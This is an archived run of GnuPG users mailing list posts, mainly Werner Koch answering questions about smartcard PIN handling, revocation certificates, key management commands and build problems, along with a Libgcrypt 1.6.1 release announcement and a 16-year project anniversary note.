Hi, me lacking the time to write an update of the 10 Years of GnuPG [2], Sam Tuke was kind enough to draft this: 16 Years of protecting privacy ══ Today marks 16 years since the first release of GNU Privacy Guard (GnuPG). In that time the project has grown from being a hacker’s hobby into one of the world’s most critical anti-surveillance tools. Today GnuPG stands at the front line of the battle between invasive surveillance and civil liberties. “Time has proven Free Software [1] to be the most trustworthy defender against companies and governments seeking to undermine citizen privacy” said Werner Koch, GnuPG Founder and Lead Developer. “Although funding our work has not always been easy, the need for universally accessible privacy tools has never been more apparent”. Some of the world’s top security specialists are now counted among GnuPG users, including Bruce Schneier, Jacob Appelbaum, and Phil Zimmerman, inventor of PGP. This summer the world learned of the extent of Government spying thanks to whistleblowers and journalists communicating using GnuPG encrypted emails. Market leading servers from Red Hat and Debian have built their reputation for security on the foundation of GnuPG-verified software. “The success of GnuPG’s first crowdfunding campaign, which received 90% of it’s target in 24 hours, shows a fresh willingness among users to support GnuPG in it’s 16th year, and points to new opportunities for the project in future” said Sam Tuke, GnuPG Campaign Manager. “The release of GnuPG 2.1 and the launch of a newly designed website later this year will bring GnuPG and its clients for Windows, Mac, Gnu/Linux, and Android to new audiences”. Over the years GnuPG has kept up to date with new algorithms, such as Elliptic Curve Cryptography, and reactive to new threats, such as key extraction via acoustic monitoring, which was announced two days ago by researchers as GnuPG updates were released, in coordination with developers. Members remain confident of the future of GnuPG and look forward to facing the privacy threats of tomorrow with community support. [1] http://fsfe.org/freesoftware/basics/4freedoms.en.html [2] http://lists.gnupg.org/pipermail/gnupg-announce/2007q4/000268.html -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. pgpsQ_qHecAvu.pgp Description: PGP signature ___ Gnupg-announce mailing list gnupg-annou...@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-announce___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Holiday giving
On Thu, 19 Dec 2013 21:39, pe...@digitalbrains.com said: PS: By the way, why does goteo.org insist on speaking what looks like Spanish to me? I intended to read the privacy policy, but it insisted on showing me Right, there is no transaltion. This has been reported by several contributors. We need to work with Goteo to fix that for the future. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: resource limit
On Fri, 20 Dec 2013 23:15, akw...@gmail.com said: gpg: keyblock resource `/etc/apt/trusted.gpg.d//webupd8team-y-ppa-manager.gpg': resource limit You, or apt-get, have configured gpg to use more than 40 keyrings. This number is from the current source, it might a bit lower for older versions - I have not checked. Maybe to many archives in sources-list - I don't know the apt-get code, though. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Using sound of CPU to extract RSA Key
On Sun, 22 Dec 2013 19:56, je...@seibercom.net said: Has anyone seen this? It seems interesting, but is it accurate? Sure. Haven't you see my announcement for 1.4.16 ? Really cool side-channel attack. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: New GUI frontend for windows
On Thu, 26 Dec 2013 13:00, je...@seibercom.net said: I certainly don't want to start a flame war here; however, if you are so unequivocally anti proprietary software, then why do you even allow a version of your product to be created that will run on it. That is If you mean why we create software which runs on proprietary operating systems like VMS, AIX, Ultrix, HP/UX, SunOS, Windows, etc. there are two related reasons for it: In the early days of modern free software, there was no computer which entirely runs on free software. A few hackers worked on making that a reality and succeeded by ~1992 by introducing GNU/Linux and freed BSD systems. Unfortunately by that time the major operating system was Windows which was entirely different to the now free Unix systems. To help people, who were forced to use Windows, several software projects were ported to Windows. This helped Windows users to get _some_ freedom back - Mozilla is probably the best known example. If it sometimes sounds like we are all anti-proprietary software, this is likely caused by the rules the GPL camp implies on their software. The goal of the GPL and other copyleft licenses is to keep the software free and avoid a re-proprietarization of it. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Admin] modifying quotes (was: Fwd: Rosetta CryptoPad released)
Randolph, I have to take the admin hat which is something I very rarely do. On Fri, 27 Dec 2013 10:27, pe...@digitalbrains.com said: Goldbug messenger thingy /again/ became CryptoPad thingy and all apostrophe's are gone, also in the next sentence. I don't care about missing apostrophes - that could be explained by a text editors misfeatures. Please explain why you have been hit by the MiniTrue or apologize for this misbehavior RSN. Such a behaviour can't be tolerated and may be a reason to ban you from this list. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. pgpw56v4BYEQ7.pgp Description: PGP signature ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: deleting secret key not implemented
On Tue, 31 Dec 2013 15:07, ndk.cla...@gmail.com said: Maybe I'm missing something... What happens if keys are kept on smartcard? Deleting the key on the smartcard depends on the smartcard. The ~/.gnupg/private-keys-v1.d/...XX.key for a smartcard based key is only a stub storing the serial number of the card for user convenience (“please insert card no. NNN”). Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Can't decrypt message encrypted with ECC
On Thu, 2 Jan 2014 18:54, eagleeyes...@yahoo.com said: I have created a test ECC 25519 subkey. You mean using the experimental code in GnuPG master? Don't use it - it is is work in progress. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: USB key form-factor smart-card readers with pinpads?
On Sun, 5 Jan 2014 05:02, sam.ku...@uclmail.net said: conventional USB stick-sized readers (e.g. Omnikey 6121) + ID-000 Take care: The Omnikey does not work with free software and 2048 bit or larger keys. Better get a Gemalto or Identive (SCM) reader. In group 2 above, the smallest reader I have found online which offers secure PIN entry is the ACR83. The question is whether this is really helpful. Yes, it protects your PIN but it does not protect the use of your decryption key. Even if the latter would be changed, it would also be quite inconvenient to enter the PIN for each encryption. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: USB key form-factor smart-card readers with pinpads?
On Sun, 5 Jan 2014 16:18, sam.ku...@uclmail.net said: The question is whether this is really helpful. Yes, it protects your PIN but it does not protect the use of your decryption key. Please could you elaborate? To make use of the decryption key the smartcard first requires that a VERIFY command is send to the card. This is what asks for the PIN. After a successful verification of the PIN the card allows the use of the PSO Decrypt command until a power down or a reset operation. Thus an attacking malware only needs to trick you info decrypt an arbitrary message and is then free to use the smartcard without having the reader ask you again for a PIN. For the signature key we have this forcesig command which switches the card into a mode which requires a VERIFY command before each PSO Sign command. There is also the signature counter to tell you how often the signature key has been used. But for the other two keys we don't have such features. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: V3 key lookup
On Sun, 5 Jan 2014 17:48, nicholas.c...@gmail.com said: Thanks Werner for making your error messages so clear. David did this and most other parts of the keyserver code. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: no valid subkey
On Mon, 6 Jan 2014 11:09, erik.hjalmar.josefs...@gmail.com said: reason I subscribed is that icedove says I have no valid subkey to my two registered email addresses: Your encryption subkey expired a month ago. A pointer to a beginners how to fix this would be much appreciated. $ gpg --edit-key 0xb240c11d gpg addkey and then follow the prompts. You probably want to add an RSA encryption subkey of the suggested size. After the key has been generated, enter save and back to the command line send your key to the keyservers: gpg --send-key 0xb240c11d Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: USB key form-factor smart-card readers with pinpads?
On Tue, 7 Jan 2014 16:28, sam.ku...@uclmail.net said: PSO:DEC but does not define it. That document also mentions PSO:DECRYPT but does not define it. And finally, that document defines PSO: DECIPHER. Are these three terms synonyms, or do they I guess so. 2. I assume that your PSO Decrypt means the same as PSO:Decrypt in the specification document mentioned above. Is this assumption correct? Yep. 3. When you say, a power down or a reset operation, do you mean (a) the card is powered down or reset, or (b) the host computer is powered down or reset, or (c) something else? With power down I mean that you remove power from the card. Thus the next time you access the card it will do a cold start. By reset I mean a couple of commands. For example selecting a different application or selecting again the OpenPGP app should reset the card state. But you better check the specs. an attacking malware only needs to trick you [into decrypting] an arbitrary message and is then free to use the smartcard without having the reader ask you again for a PIN. That is somewhat disappointing to me, although perhaps that is because my knowledge is limited and I am simply unaware of a good reason for this behaviour. Without that you won't like to read a bunch of encrypted mails. the card from the reader, or both), would cause subsequent malicious attempts to call PSO Decrypt, to result in failure (at least until the Right. Most likely they the PIN retry counter goes down until the card is locked. Thus attacking malware may easily DoS your card - however malware is commonly not interested in getting noticed by the user. I heard that some pinpad equipped readers have filters for the VERIFY command so that the HOST may not issue a plain VERIFY command to bypass the pinpad. I can't find the string PSO Sign in [1]. Are you using it synonymously with PSO: COMPUTE DIGITAL SIGNATURE (and/or PSO:CDS)? Yep. Apologies for my non-standard compliant terms. I can't find the string forcesig in [1]. Please can you tell me where it is documented? See the card HOWTO or try gpg --card-edit, admin, help. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Tue, 7 Jan 2014 15:32, h...@guardianproject.info said: OpenPGP card as a PKCS11 keystore. It seems that things are close: Java can use NSS as a provider of PKCS11. I guess the question is whether opensc is making a PKCS#11 interface to the OpenPGP card, that's the bit that I don't Scute also provides an pkcs#11 interface to NSS. Thus you should be able to use it also with Java. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: GPG Assuan protocol usage
On Wed, 8 Jan 2014 00:30, alan.meek...@gmail.com said: D (genkey (rsa (nbits 4096))) Use D (genkey (rsa (nbits 4:4096))) to match the S-expression syntax. A leading digit denotes a length and thus you can't enter a number without its length. Yes, this is a common pitfall. Instead of socat, I suggest the use of gpg-connect-agent (which even feature a simple script language). If gpg-agent is installed on a system gpg-connect-agent is also available. As an alternative you may also use the Assuan interface of GPGME (see gpa/src/cardman.c for examples). Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: GnuPG 2.0.22 installation on Suse Enterprise 11.3
On Wed, 8 Jan 2014 09:06, spldemou...@gmail.com said: I was attempting to upgrade the GnuPG 2.0.9 on the Suse Linux to version 2.0.22 but was hit by some missing dependency. May I know what are the necessary package that I need to install before installing GnuPG 2.0.22? Running ./configure shows you all missing dependencies. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Wed, 8 Jan 2014 16:26, h...@guardianproject.info said: key #3 is for authentication, is there some restriction in the OpenPGP card that would prevent the certificate/key combo in position #3 from being used for signing? No. At least not enforced by the card or GnuPG. What I read there is that in order to use the certificate/key combo in position #3 for decrypting emails, the key in position #2 (decryption) must match the key in position number #3. Is there a similar restriction for signing? I can't tell because I have not looked at OpenSC for many years. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: error during make
On Tue, 14 Jan 2014 21:50, glorius.gadu...@ge.com said: make: Fatal error: Don't know how to make target `../cipher/libcipher.a' Current working directory /orpogdp1/app/proj_software/gnupg-1.4.16/tools Did you used make -jN - it is possible that a dependecy is missing. Or you make is broken. What OS and what compiler are you using? Workaround: (cd cipher make) make Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: using an OpenPGP card with Java (keytool and jarsigner)
On Fri, 17 Jan 2014 02:24, se...@literati.org said: Scute works great with Firefox, but keep in mind it requires gpg-agent (or Sure. That is the whole point of the exercise. at least scdaemon). AFAIK it's not intended to work with anything other than Firefox right now. I've been meaning to try it out with wpa_supplicant Well, it has not been tested with anything else. However, it implements the pkcs#11 interface properly for signature keys and Marcus even came up with a free and readable implementation of the pkcs11 header file. The code seems fairly straightforward and it comes with documentation for spying on the PKCS#11 calls to help troubleshoot the implementation, so even if it doesn't work it may not require too much hacking to make it Right. I would love to see a new maintainer for it. If there are any GnuPG related problems I will for sure help with it. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: time delay unlock private key.
On Thu, 23 Jan 2014 15:34, o...@mat.ucm.es said: It gave you three attempts to login in. If you failed there was a time delay of 20 min, if you failed again, the time delay was prolonged to one hour, and then I think to one day. IIRC, each CMS users gets his own VM and minidisk. Thus what you mean is the regular login protection most OSes provide. For Unix you configure this in /etc/login.defs. However, GnuPG is a user process and the agent as well as the keys are under the full control of the user. Thus the OS is not able to handle this like the login. After all, why should it. If you are logged in you may do anything with your data - why restrict it. My private pgp and smime keys are secured by a password, but there is no time delay, which makes a brute force attack possible. What is your threat model? Users who are able to access gpg/gpg-agent but are not able to read secring.gpg or private-keys-v1.d? Well, it is possible to do this with SELinux and then such a feature might make sense. However, there is a plethora of other things you need to secure first. In any case if an attacker has access to your machine or at least to your account, you already reached game over state. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
BoF at FOSDEM ?
Hi! is anyone interested in a BoF at FOSDEM on February 1 or 2? Anything special to put on the agenda? How long should we plan 30, 45 or 60 minutes? I plan to arrive on Saturday by noon which might be a bit too late to sign up for a slot. Thus if there is interest in holding a BoF, I would ask someone else to walk over to info desk at the H-Building and sign up for a slot on Saturday afternoon or Sunday. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: time delay unlock private key.
On Thu, 23 Jan 2014 19:20, r...@sixdemonbag.org said: Not really, although DKG gave you a good heads-up about the number of iterations in s2k. FWIW: With GnuPG 2.x the default iteration count is calibrated to an iteration time of 100ms. That is of course machine dependent. To view that count you may run gpg-connect-agent as in this example: $ gpg-connect-agent 'getinfo s2k_count' /bye D 16777216 OK Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Revocation certificates
On Thu, 23 Jan 2014 21:25, ekl...@gmail.com said: PS: Please, do not tell me one might have forgotten his passphrase. In this case there is no harm in shredding the secret key and waiting for the expiration Experience has shown that this is the most common reason why there are so many secret keys on the servers which are useless. Further, an expiration data is not set by default and waiting a year until the key expired is not a good option. Further, it is also common that a secret key is lost (disk crash - no backup, backup not readable or too old) or simply stolen. This has the same effect as a forgotten passphrase. In particular in the stolen key case, you want to immediately revoke it and not wait until you can restore the key from a backup stored at some safe place. There are other rare scenarios, for example a high security key in a far away place, you are traveling and you want to immediately revoke the key for whatever reason. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: Revocation certificates
On Thu, 23 Jan 2014 23:15, ekl...@gmail.com said: Oh? I thought the most common reason was test keys, and tutorials which explain step-by-step how to make a keypair and push it on a keyserver, without telling Obviously, I don't have no hard evidence for the claim that forgotten passpharses are a reason for many unusable keys. However, I have heard too many times statements like “Please don't encrypt to that key; I - uhmm - can't remember my passphrase”. And keys with an expiration date are someday deleted, while keys, even revoked, without are never, are they? No they are not deleted. They are still useful for signature verification. Think about gnupg 1.0.0 which has been signed by a long expired key of mine - verifying it still gives some evidence that the tarball is genuine. The key merely expired. If I had reasons to assume that the key is compromised I would issue a revocation. Verification tools show that. BTW, revocation certificates are not produced by default either. So, why not advise people to put an expiration date, instead of counselling them The reason why they are not generated by default is that I am sure that many people would accidentally publish the revocation. That is not optimal and thus my current plan is to create a revocation be default but modify the armored file so that it can only be imported after editing the file. Well, my question is then: Why not restore the key immediately (having stored it at the place you would have stored the revocation certificate), and revoke it then? The key is of course stored at a bank safe. The sheet/cdrom with the revocation is in the drawer of my desk. the usefulness of revocation certificate, just the advice always popping out to generate a revocation certificate in any case, without thinking of whether it would be useful. Okay, that is a different thing. I plan to change that with a notice saying which file has the edited revocation certificate. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: BoF at FOSDEM ?
On Thu, 23 Jan 2014 23:28, arne.renkema-pad...@cased.de said: Sound like a good plan. My preference would be the 1st of February around lunch. Well, the BoF rooms are assigned on a first come first served base. Thus we can't sign up for a certain time. I am fine with Saturday, but better not before 13:00. Any topics you want to discuss? Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: BoF at FOSDEM ?
On Fri, 24 Jan 2014 21:14, arne.renkema-pad...@cased.de said: My personal pet-problem is the usability of tools like GPG. Okay, thus we have - Report on current keyserver work [Kristian] - Make GPG invisible to the user [Arne] - ECC and GnuPG progress [Werner] Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: time delay unlock private key.
On Sat, 25 Jan 2014 10:31, shm...@riseup.net said: $ gpg-connect-agent 'getinfo s2k_count' /bye ERR 280 not implemented You are using GnuPG version 2.0.15. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: time delay unlock private key.
On Sat, 25 Jan 2014 13:33, shm...@riseup.net said: $ gpg-connect-agent 'getinfo s2k_count' /bye ERR 280 not implemented You are using GnuPG version 2.0.15. $ gpg2 --version gpg (GnuPG) 2.0.22 Gnome-keyring or Seahorse gpg-agent connection hijacking active? Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: default (secret) key for gpg
On Tue, 28 Jan 2014 17:15, o...@mat.ucm.es said: - gpg.conf: default-key 65AD077A - options: default-key 65AD077A Do not use options - it has been replaced by gpg.conf so long ago that I barely remember that file. (I even rebooted to restart the gpg-agent). But xemacs, gnus, epg always picks up the old key. I will write to that Maybe (setq mml2015-signer 0x65AD077A) Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
[Announce] Libgcrypt 1.6.1 released
Hello! The GNU project is pleased to announce the availability of Libgcrypt version 1.6.1. This is a maintenance release to fix problems found in the recently released 1.6.0 version. Libgcrypt is a general purpose library of cryptographic building blocks. It does not provide any implementation of OpenPGP or other protocols. Thorough understanding of applied cryptography is required for proper use Libgcrypt. Noteworthy changes in version 1.6.1 (2014-01-29) * Added emulation for broken Whirlpool code prior to 1.6.0. * Improved performance of KDF functions. * Improved ECDSA compliance. * Fixed locking for Windows and non-ELF Pthread systems (regression in 1.6.0) * Fixed message digest lookup by OID (regression in 1.6.0). * Fixed a build problem on NetBSD. * Fixed memory leaks in ECC code. * Fixed some asm build problems and feature detection bugs. * Interface changes relative to the 1.6.0 release: GCRY_MD_FLAG_BUGEMU1NEW (minor API change). Download Source code is hosted at the GnuPG FTP server and its mirrors as listed at http://www.gnupg.org/download/mirrors.html . On the primary server the source tarball and its digital signature are: ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.bz2 (2413k) ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.bz2.sig That file is bzip2 compressed. A gzip compressed version is here: ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.gz (2872k) ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.1.tar.gz.sig Alternativley you may upgrade using this patch file: ftp://ftp.gnupg.org/gcrypt/libgcrypt/libgcrypt-1.6.0-1.6.1.diff.bz2 (244k) In order to check that the version of Libgcrypt you are going to build is an original and unmodified one, you can do it in one of the following ways: * Check the supplied OpenPGP signature. For example to check the signature of the file libgcrypt-1.6.1.tar.bz2 you would use this command: gpg --verify libgcrypt-1.6.1.tar.bz2.sig This checks whether the signature file matches the source file. You should see a message indicating that the signature is good and made by the release signing key 4F25E3B6 which is certified by my well known key 1E42B367. To retrieve the keys you may use the command gpg --fetch-key finger:w...@g10code.com. * If you are not able to use GnuPG, you have to verify the SHA-1 checksum: sha1sum libgcrypt-1.6.1.tar.bz2 and check that the output matches the first line from the following list: f03d9b63ac3b17a6972fc11150d136925b702f02 libgcrypt-1.6.1.tar.bz2 fe6d442881a28a37d16348cdbf96b41b8ef38ced libgcrypt-1.6.1.tar.gz 35d002247186884ba3730c91f196a5de48c3fcf8 libgcrypt-1.6.0-1.6.1.diff.bz2 Copying === Libgcrypt is distributed under the terms of the GNU Lesser General Public License (LGPLv2.1+). The helper programs as well as the documentation are distributed under the terms of the GNU General Public License (GPLv2+). The file LICENSES has notices about contributions that require these additional notices are distributed. Support === For help on developing with Libgcrypt you should read the included manual and optional ask on the gcrypt-devel mailing list [1]. A listing with commercial support offers for Libgcrypt and related software is available at the GnuPG web site [2]. The driving force behind the development of Libgcrypt is my company g10 Code. Maintenance and improvement of Libgcrypt and related software takes up most of our resources. To allow us to continue our work on free software, we ask to either purchase a support contract, engage us for custom enhancements, or to donate money: http://g10code.com/gnupg-donation.html Thanks == Many thanks to all who contributed to Libgcrypt development, be it bug fixes, code, documentation, testing or helping users. Happy hacking, Werner [1] http://lists.gnupg.org/mailman/listinfo/gcrypt-devel [2] http://www.gnupg.org/service.html -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. pgp50xpu5Bq1I.pgp Description: PGP signature ___ Gnupg-announce mailing list gnupg-annou...@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-announce___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: cryptanalysis question: Does knowing some of the content of the message make the full message vulnerable to decryption?
On Fri, 31 Jan 2014 08:39, micha...@gmx.de said: you are a legitimate sender. I don't know how gpg does it, in academic signature I use an hmac to protect solely symmetrically enciphered OpenPGP defines a MDC feature to detect tampering with the encrypted message. It works by appending the SHA-1 digest to the plaintext and include it in the encryption process. On decryption the decrypted plaintext is hashed again and the digest compared to the just decrypted digest. This deliberately works without a key (as in a MAC) to provide deniability for a encrypted-only message. The MDC feature is in use for about 14 years. RFC-4880 has alo the details. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: BoF at FOSDEM ?
On Sat, 1 Feb 2014 14:13, mar...@martinpaljak.net said: Too bad I missed. Where did you get with the ECC discussion? I merely reported about the status and that I think it is better to wait a few weeks until the I-D for the new curves is more complete. Then we can start to implement that. Kristian reported that the keyservers do not yet fully support ECC (required for keyid and fingerprints) but that should not be a showstopper. Deployment of new keyserver code is happening much faster than in the past. We have been about 12 people at the BoF and from their comments I read that non-NIST curves should be the default. But first of all I need to fix some things I broke in the last weeks. We also talked about a possible 1.5 release to make 1.4 maintenance easier by switching to Libgcrypt. This would save use from maintaining a completely detached branch of crypto code for 1.4 and allow to add ECC support to GnuPG-1. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: making the X.509 infrastructure available for OpenPGP
On Tue, 4 Feb 2014 17:09, d...@fifthhorseman.net said: I don't know of a formalized way to do the other mapping, but it seems like it would be pretty straightforward to embed the full X.509 certificate in a notation packet on a self-sig (presumably a self-sig PGP does this. IIRC, Hal Finney once posted the specs for this to the OpenPGP WG. Unfortunately I can't find it in my archives. It was a pretty obvious thing, though. Salam-Shalom, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users
Re: making the X.509 infrastructure available for OpenPGP
On Wed, 5 Feb 2014 06:03, d...@fifthhorseman.net said: Werner recently (in message ID 87zjmv127f@vigenere.g10code.de) indicated his acceptance of a notation named extended-us...@gnupg.org with a value that can be set to bitcoin. Maybe the same notation We can do that as soon as gniibe has finihsed hist work. could be used to indicate s/mime-sign or s/mime-encrypt for these No problem. But name it cms-sign and cms-encrypt. CMS is used by S/MIME but can and is used standalone. Same as with OpenPGP and PGP/MIME. Shalom-Salam, Werner -- Die Gedanken sind frei. Ausnahmen regelt ein Bundesgesetz. ___ Gnupg-users mailing list Gnupg-users@gnupg.org http://lists.gnupg.org/mailman/listinfo/gnupg-users